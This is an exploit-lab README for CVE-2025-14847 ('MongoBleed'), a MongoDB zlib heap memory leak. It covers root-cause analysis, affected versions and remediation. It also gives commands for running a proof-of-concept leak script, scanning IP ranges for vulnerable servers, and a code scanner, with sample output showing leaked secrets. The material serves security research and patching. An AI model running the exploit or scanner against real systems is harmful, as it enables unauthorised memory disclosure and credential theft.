Share
## https://sploitus.com/exploit?id=855F51F5-0471-5277-8947-AD849D004EA5
# ๐ฉธ MongoBleed - CVE-2025-14847 Security Research Lab
CVE-2025-14847 | CVSS 8.7 (High) | Unauthenticated Memory Disclosure
๐ Full Documentation โข
๐ฌ Technical Analysis โข
โก Quick Commands
---
## ๐ฏ CVE-2025-14847 Summary
**MongoBleed** is a critical memory disclosure vulnerability in MongoDB's network transport layer that allows **unauthenticated remote attackers** to exfiltrate sensitive heap memory without any credentials or user interaction.
### Impact
| Category | Description |
|----------|-------------|
| **Attack Type** | Remote, unauthenticated memory disclosure |
| **Root Cause** | Zlib decompression returns allocated buffer size instead of actual data length |
| **Data Exposed** | Database passwords, API keys, session tokens, AWS credentials, internal server state |
| **Severity** | **CVSS 8.7 (High)** - Network-accessible, no auth required |
| **Exploitation** | Active exploitation observed in the wild since Dec 28, 2025 |
### Vulnerable Versions (At a Glance)
| Branch | Vulnerable | Fixed | Action |
|--------|------------|-------|--------|
| **8.2.x** | 8.2.0 โ 8.2.2 | **8.2.3** | Upgrade immediately |
| **8.0.x** | 8.0.0 โ 8.0.16 | **8.0.17** | Upgrade immediately |
| **7.0.x** | 7.0.0 โ 7.0.27 | **7.0.28** | Upgrade immediately |
| **6.0.x** | 6.0.0 โ 6.0.26 | **6.0.27** | Upgrade immediately |
| **5.0.x** | 5.0.0 โ 5.0.31 | **5.0.32** | Upgrade immediately |
| **4.4.x** | 4.4.0 โ 4.4.29 | **4.4.30** | Upgrade immediately |
| **โค4.2.x** | All versions | None | โ ๏ธ EOL - Migrate to supported version |
> ๐ **[See Full Affected Versions Table โ](DOCUMENTATION.md#affected-versions)**
### Exposure Scale
- **87,000 - 194,000** MongoDB instances publicly exposed
- **42%** of cloud environments host vulnerable instances (Wiz Research)
- **No authentication required** - attack occurs pre-auth
- **Silent exploitation** - no logs, no crashes
---
## TL;DR for Engineering Teams
| Aspect | Details |
|--------|---------|
| **What is vulnerable** | MongoDB Server network transport layer using zlib compression |
| **Severity** | High (CVSS 8.7/7.5) |
| **Impact** | Unauthenticated, remote disclosure of uninitialised heap memory |
| **Why it matters** | Leaked fragments contain database passwords, AWS secret keys, and internal server states |
| **Exploit status** | Public Proof-of-Concept (PoC) "mongobleed" is validated and circulating |
| **What to do today** | Upgrade to patched versions immediately or disable zlib compression |
## ๐ฌ Vulnerability Anatomy
### Technical Analysis
The vulnerability exists in MongoDB's network transport layer (`message_compressor_zlib.cpp`) where a critical flaw in the zlib decompression logic allows unauthenticated attackers to leak sensitive server memory.
#### Root Cause
```cpp
// VULNERABLE CODE (before fix)
counterHitDecompress(input.length(), output.length());
return {output.length()}; // โ Returns ALLOCATED buffer size
// PATCHED CODE (after fix)
counterHitDecompress(input.length(), output.length());
return length; // โ
Returns ACTUAL decompressed data length
```
#### Exploitation Flow
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ MongoBleed Attack Vector โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ โ
โ ATTACKER VULNERABLE MongoDB โ
โ โ โ โ
โ โ 1. Send OP_COMPRESSED message โ โ
โ โ uncompressedSize: 8192 (LIE) โ โ
โ โ actual data: ~100 bytes โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ> โ
โ โ โ โ
โ โ 2. Allocate 8192-byte buffer โ
โ โ 3. Decompress ~100 bytes โ
โ โ 4. BUG: Return buffer.length() = 8192 โ
โ โ 5. BSON parser reads uninitialized memory โ
โ โ โ โ
โ โ 6. Error response with leaked โ โ
โ โ memory as "field names" โ โ
โ โ ๐ฌ **[See Technical Analysis โ](TECHNICAL_ANALYSIS.md)** for detailed vulnerability anatomy, exploit construction, and detection methods.
## ๐ Project Structure
```
mongobleed-exploit-CVE-2025-14847/
โโโ exploit/ # ๐ด Exploit Lab
โ โโโ docker-compose.yml # Vulnerable + Patched MongoDB instances
โ โโโ mongobleed.py # Memory leak exploit PoC
โ โโโ init/init-mongo.js # Sensitive test data
โ โโโ test-exploit.sh # Lab test script
โ โโโ README.md # Lab documentation
โ
โโโ scanner/ # ๐ Network Scanner
โ โโโ mongobleed_scanner.py # IP/domain vulnerability scanner
โ โโโ sample-targets.txt # Sample targets file
โ โโโ README.md # Scanner documentation
โ
โโโ code-scan/ # ๐ Code Scanner
โ โโโ main.py # CLI entry point
โ โโโ scanners/ # Docker, Python, Infra scanners
โ โโโ models/ # Finding, Vulnerability models
โ โโโ integrations/ # Phoenix Security upload
โ โโโ README.md # Code scanner documentation
โ
โโโ original-exploit/ # ๐ Original PoC reference
```
## ๐ Quick Start
### 1. Exploit Lab
```bash
cd exploit
# Start lab (vulnerable + patched instances)
docker-compose up -d
sleep 10
# Test vulnerable instance (should leak memory)
python3 mongobleed.py --host localhost --port 27017
# Test patched instance (should NOT leak memory)
python3 mongobleed.py --host localhost --port 27018
# Full lab test
./test-exploit.sh
```
### 2. Network Scanner
```bash
cd scanner
# Scan single host
python3 mongobleed_scanner.py 192.168.1.100
# Scan network range
python3 mongobleed_scanner.py 192.168.1.0/24
# Scan from file
python3 mongobleed_scanner.py @sample-targets.txt --json --output results.json
```
### 3. Code Scanner
```bash
cd code-scan
# Scan project for vulnerable MongoDB versions
python3 main.py scan /path/to/project
# Scan and upload to Phoenix
python3 main.py scan /path/to/project --upload-phoenix
# Run tests
python3 main.py test
```
## โก Quick Commands
```bash
# === EXPLOIT LAB ===
# Start lab
cd exploit && docker-compose up -d && sleep 10
# Run exploit (vulnerable instance)
python3 exploit/mongobleed.py --host localhost --port 27017
# Run exploit (patched instance - verify no leaks)
python3 exploit/mongobleed.py --host localhost --port 27018
# === NETWORK SCANNER ===
# Scan local lab
python3 scanner/mongobleed_scanner.py localhost:27017 localhost:27018
# Scan network
python3 scanner/mongobleed_scanner.py 192.168.1.0/24 --threads 20
# === CODE SCANNER ===
# Scan current directory
python3 code-scan/main.py scan .
# Scan with JSON output
python3 code-scan/main.py scan /path/to/project --json --output results.json
# Scan and upload to Phoenix
python3 code-scan/main.py scan /path/to/project --upload-phoenix
```
## ๐ Output Examples
### Exploit Output
```
[*] mongobleed - CVE-2025-14847 MongoDB Memory Leak
[*] Target: localhost:27017
[*] Scanning offsets 20-8192...
[+] offset= 117 len= 39: ssions^\u0001๏ฟฝr๏ฟฝ๏ฟฝ*YDr๏ฟฝ๏ฟฝ๏ฟฝ
[+] offset=16582 len=1552: MemAvailable: 8554792 kB\nBuffers: ...
[+] offset=18731 len=3908: MONGOBLEED_PRIVATE_KEY_DATA_123...
[!] TARGET IS VULNERABLE TO CVE-2025-14847
[*] Total leaked: 8748 bytes
[*] Unique fragments: 42
[!] Potential secrets detected:
โข RSA Private Key
โข Lab Secret
```
### Network Scanner Output
```
[*] Scanning 254 targets with 10 threads...
[1/254] 192.168.1.10:27017 - 8.2.2 [VULNERABLE - CONFIRMED]
[2/254] 192.168.1.11:27017 - 8.2.3 [SAFE]
SUMMARY:
----------------------------------------
Total targets scanned: 254
Reachable hosts: 12
MongoDB instances: 8
VULNERABLE: 3
```
### Code Scanner Output
```
================================================================================
MONGOBLEED CODE SCANNER REPORT - CVE-2025-14847
================================================================================
๐จ VULNERABLE MONGODB VERSIONS DETECTED
1. mongo@8.2.2
File: /project/docker-compose.yml
Type: docker-compose
Reason: Version 8.2.2 is in vulnerable range [8.2.0 - 8.2.2]
โ
Upgrade to: 8.2.3
CVE: CVE-2025-14847
```
## ๐ก๏ธ Remediation Summary
| Priority | Action | Details |
|----------|--------|---------|
| ๐ด **1** | **Upgrade MongoDB** | Update to fixed versions (8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32, 4.4.30) |
| ๐ **2** | **Disable zlib** | `mongod --setParameter networkMessageCompressors=snappy,zstd` |
| ๐ก **3** | **Network isolation** | Firewall port 27017, use VPN/private networking |
| ๐ต **4** | **Rotate credentials** | If exposed, rotate all database passwords, API keys, tokens |
> ๐ **[See Full Remediation Guide โ](DOCUMENTATION.md#remediation)**
---
## ๐ Phoenix Security Integration
All scanners support uploading findings to Phoenix Security platform:
```bash
# Create config
python3 code-scan/main.py create-config
cp .phoenix.config.TEMPLATE .phoenix.config
# Edit with your credentials
# [phoenix]
# client_id = your_client_id
# client_secret = your_client_secret
# api_base_url = https://api.securityphoenix.cloud
# Scan and upload
python3 code-scan/main.py scan /path/to/project --upload-phoenix
```
---
## ๐ Security Notice
โ ๏ธ **IMPORTANT**: This toolkit is provided for authorized security testing and research purposes only.
- Only test systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal
- Leaked data may contain sensitive information - handle responsibly
- Report vulnerabilities through proper disclosure channels
## ๐ Documentation
### Core Documentation
| Document | Description |
|----------|-------------|
| ๐ [**DOCUMENTATION.md**](DOCUMENTATION.md) | Complete project documentation with setup, usage, and remediation |
| ๐ฌ [**TECHNICAL_ANALYSIS.md**](TECHNICAL_ANALYSIS.md) | In-depth vulnerability anatomy, exploit mechanism, and detection |
| โก [**QUICK_COMMANDS.md**](QUICK_COMMANDS.md) | Copy-paste ready commands for all tools |
### Tool Documentation
| Tool | Documentation | Description |
|------|---------------|-------------|
| ๐ด Exploit Lab | [exploit/README.md](exploit/README.md) | Docker-based vulnerable/patched MongoDB lab |
| ๐ Network Scanner | [scanner/README.md](scanner/README.md) | IP/CIDR vulnerability scanner |
| ๐ Code Scanner | [code-scan/README.md](code-scan/README.md) | Codebase scanner for vulnerable versions |
## ๐ External References
- [OX Security Advisory](https://www.ox.security/blog/attackers-could-exploit-zlib-to-exfiltrate-data-cve-2025-14847/)
- [MongoDB Fix Commit](https://github.com/mongodb/mongo/commit/505b660a14698bd2b5233bd94da3917b585c5728)
- [NVD Entry - CVE-2025-14847](https://nvd.nist.gov/vuln/detail/CVE-2025-14847)
## ๐ค Credits
- Original exploit by **Joe Desimone** ([@dez_](https://x.com/dez_))
- Lab environment and scanner enhancements for security research
## ๐ License
For authorized security testing only. Use responsibly.
---
**Last Updated**: December 2025